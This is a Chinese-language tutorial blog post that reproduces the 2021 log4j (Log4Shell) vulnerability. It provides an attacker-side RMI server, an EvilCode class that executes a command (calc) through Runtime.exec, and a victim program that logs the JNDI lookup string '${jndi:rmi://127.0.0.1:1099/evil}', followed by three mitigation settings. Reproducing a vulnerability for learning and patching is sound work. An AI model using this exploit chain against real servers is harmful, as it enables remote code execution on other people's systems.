Java RMI引起的log4j漏洞問題重現
2021-12-10日左右,java的log4j框架出現瞭一個大漏洞,對服務器案例引起瞭不小的影響,當然隻對於log4j的日志使用者來說,如果你是spring框架,用的是logback,不存在這個問題。
RMI和JNDIRMI
- (Remote Method Invocation) 即Java遠程方法調用,一種用於實現遠程過程調用的應用程序編程接口
- JNDI (Java Naming and Directory Interface)是一個應用程序設計的API,為開發人員提供瞭查找和訪問各種命名和目錄服務的通用、統一的接口
- JNDI和RMI的主要關系是RMI註冊的服務可以通過JNDIAPI訪問。在討論到Spring反序列化漏洞之前,先看看如果通過JNDI來調用RMI註冊的服務。
模擬漏洞重現
pom依賴
<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-logging</artifactId> </exclusion> </exclusions> </dependency> <!--log4j2核心包--> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.14.0</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.14.0</version> </dependency>
黑客端
/** * 構建RMI服務來響應惡意代碼 * <p> * Java RMI,即 遠程方法調用(Remote Method Invocation),一種用於實現遠程過程調用(RPC)的Java API, 能直接傳輸序列化後的Java對象和分佈式垃圾收集。它的實現依賴於(JVM),因此它僅支持從一個JVM到另一個JVM的調用。 */ public class RMIServer { @SneakyThrows public static void main(String... args) { try { // 本地主機上的遠程對象註冊表Registry的實例,默認端口1099 LocateRegistry.createRegistry(1099); Registry registry = LocateRegistry.getRegistry(); System.out.println("Create RMI registry on port 1099"); //返回的Java對象 Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null); ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); // 把遠程對象註冊到RMI註冊服務器上,並命名為evil registry.bind("evil", referenceWrapper); } catch (RemoteException | AlreadyBoundException | NamingException e) { e.printStackTrace(); } } /** * 執行任意的腳本,目前的腳本會使windows服務器打開計算器. */ public class EvilCode { static { System.out.println("受害服務器將執行下面命令行"); Process p; String[] cmd = {"calc"}; try { p = Runtime.getRuntime().exec(cmd); InputStream fis = p.getInputStream(); InputStreamReader isr = new InputStreamReader(fis); BufferedReader br = new BufferedReader(isr); String line = null; while ((line = br.readLine()) != null) { System.out.println(line); } } catch (IOException e) { e.printStackTrace(); } } }
網站端
public class Server { private static final Logger logger = LogManager.getLogger(); public static void main(String[] args) { String name = "${java:runtime}"; logger.info("name:{}", name); //模擬填寫數據,輸入構造好的字符串,使受害服務器打印日志時執行遠程的代碼 同一臺可以使用127.0.0.1 String username = "${jndi:rmi://127.0.0.1:1099/evil}"; //正常打印業務日志 logger.error("username:{}", username); } }
【緊急補救措施3選1】
- 修改 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
- 修改配置 log4j2.formatMsgNoLookups=True
- 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true
到此這篇關於java RMI引起的log4j漏洞的文章就介紹到這瞭,更多相關java RMI 漏洞內容請搜索WalkonNet以前的文章或繼續瀏覽下面的相關文章希望大傢以後多多支持WalkonNet!
推薦閱讀:
- 全網最新Log4j 漏洞修復和臨時補救方法
- 如何解決Spring in action @valid驗證不生效的問題
- JAVA SpringBoot統一日志處理原理詳解
- 深入淺析Java常用的格式化Json工具類
- 解決Swagger2返回map復雜結構不能解析的問題